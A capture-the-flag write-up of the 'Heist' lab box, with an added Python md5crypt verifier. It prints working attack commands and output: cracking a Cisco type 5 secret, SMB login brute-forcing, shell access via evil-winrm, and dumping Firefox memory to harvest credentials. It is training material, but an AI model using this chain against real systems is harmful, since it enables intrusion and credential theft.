Heist is a box rated easy that covers practical enumeration techniques and attack vectors. The initial foothold is gained by leveraging an improper security configuration. Start by checking which ports are open.
nmap -sS -Pn -A 10.10.10.149
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Enumerate public files and folders on the web server.
# dirb http://10.10.10.149
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Oct 19 18:27:44 2019
URL_BASE: http://10.10.10.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.149/ ----
==> DIRECTORY: http://10.10.10.149/attachments/
==> DIRECTORY: http://10.10.10.149/css/
==> DIRECTORY: http://10.10.10.149/images/
==> DIRECTORY: http://10.10.10.149/Images/
+ http://10.10.10.149/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.149/js/
Determine the SMB version using Metasploit's smb2 scanner. In this case the SMB 2 dialect reported is 255.2.
msf5 auxiliary(scanner/smb/smb2) > exploit
[+] 10.10.10.149:445 - 10.10.10.149 supports SMB 2 [dialect 255.2] and has been online for 3671180 hours
[*] 10.10.10.149:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Cisco type 5 secrets are vulnerable to dictionary attacks. The type 5 secret found at http://10.10.10.149/attachments/config.txt is saved to a file in this format:
cisco5.txt
enable_secret:$1$pdQG$o8nrSzsGXeaduXrjlvKc91
Then John the Ripper is used to brute-force the password with the rockyou.txt wordlist.
# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt cisco5.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (enable_secret)
1g 0:00:00:21 DONE (2019-10-22 17:07) 0.04633g/s 162434p/s 162434c/s 162434C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed
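The enable secret above is plain md5crypt, the same crypt(3) $1$ scheme John loaded it as, so a single candidate can be checked against it without a cracker. This is an added example, not part of the original writeup; the hash and the candidate password come from the page, and the fixed 1000-round MD5 construction it implements is why a wordlist run finishes in seconds. Configs that must leave the device should use the stronger type 8 (PBKDF2-SHA-256) or type 9 (scrypt) secrets that current IOS supports.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"  # the enable secret from config.txt above


def _to64(value: int, n: int) -> str:
    """Encode n 6-bit groups of value, least significant group first."""
    out = ""
    for _ in range(n):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Reference md5crypt (the FreeBSD/PHK scheme) used by Cisco type 5 secrets."""
    pw, sl, mg = password.encode(), salt.encode()[:8], magic.encode()
    ctx = hashlib.md5(pw + mg + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    # Mix in the alternate digest once per 16 bytes of password length.
    for pl in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, pl)])
    # For each bit of len(pw): a NUL byte if the bit is set, else the first password byte.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # A fixed 1000 MD5 rounds: cheap enough that wordlist runs finish in seconds.
    for i in range(1000):
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    # Digest bytes are interleaved in this fixed order before the base64-like encoding.
    enc = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    )
    return f"{magic}{sl.decode()}${enc}{_to64(final[11], 2)}"


def verify_type5(secret: str, candidate: str) -> bool:
    """True if candidate reproduces a '$1$salt$hash' Cisco type 5 secret."""
    _, magic, salt, _ = secret.split("$")
    return md5crypt(candidate, salt, f"${magic}$") == secret
```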
Create a file with the available users, users.txt, and a file with the available passwords, passwords.txt. Then use the Metasploit scanner smb_login to see whether any combination matches against the SMB service discovered with nmap.
# msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhost 10.10.10.149
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /root/projects/heist/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/projects/heist/users.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.149:445 - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Hazard:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Hazard:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:stealth1agent',
[*] 10.10.10.149:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We notice that one combination is successful:
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
Using the credentials, we list the available shares:
# smbclient -L 10.10.10.149 -U Hazard
Enter WORKGROUP\Hazard's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
Then list the permissions for the shares. IPC$ appears readable to user Hazard:
# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Further enumerate using enum4linux. It reveals a few more users, which we feed back into the login scanner:
# enum4linux -u Hazard -p stealth1agent -a 10.10.10.149 2>/dev/null
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
Another valid user/password combination is revealed:
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Chase:Q4)sJu\Y8qz*A3?d'
user: Chase
pass: Q4)sJu\Y8qz*A3?d
Connect using evil-winrm and the newly discovered credentials:
# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
Get the user flag hash from user.txt:
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127daef77ab6d9d92008653295f59c4
Upload procdump64 to the host (https://docs.microsoft.com/en-us/sysinternals/downloads/procdump).
Observe the PIDs of the Firefox processes running on the host:
*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> ps|findstr fire
358 25 16100 279180 1.28 6424 1 firefox
390 31 38912 305376 34.13 6488 1 firefox
1134 69 127720 465632 38.45 6624 1 firefox
343 19 10008 266232 0.83 6760 1 firefox
408 31 16964 294960 1.59 7104 1 firefox
Execute a dump of one of the Firefox processes; it will write around 450 MB.
The procdump64 option -ma writes a 'Full' dump file:
-ma Write a 'Full' dump file.
Includes All the Image, Mapped and Private memory.
./procdump64.exe -accepteula -ma 6624
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[02:07:24] Dump 1 initiated: C:\Users\Chase\Documents\vrs\firefox.exe_191028_020724.dmp
[02:07:25] Dump 1 writing: Estimated dump file size is 467 MB.
[02:07:28] Dump 1 complete: 468 MB written in 3.7 seconds
[02:07:28] Dump count reached.
Search the dump contents for the string 'admin' and observe a new set of credentials. They are recoverable because the login form submits the username and password in the URL query string, which remains in the browser process memory:
*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> Get-Content firefox.exe_191028_020724.dmp | Select-String 'admin'
...http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=...jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/omni.ja!/modules/UrlbarValueFormatter.jsm...
u: admin@support.htb
p: 4dD!5}x/re8]FBuZ
Initiate a connection as Administrator using the newly found password. Read the root flag, found on the Administrator's desktop:
root@kali:~/projects/heist/evil-winrm# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50dfa3c6bfd20e2e0d071b073d766897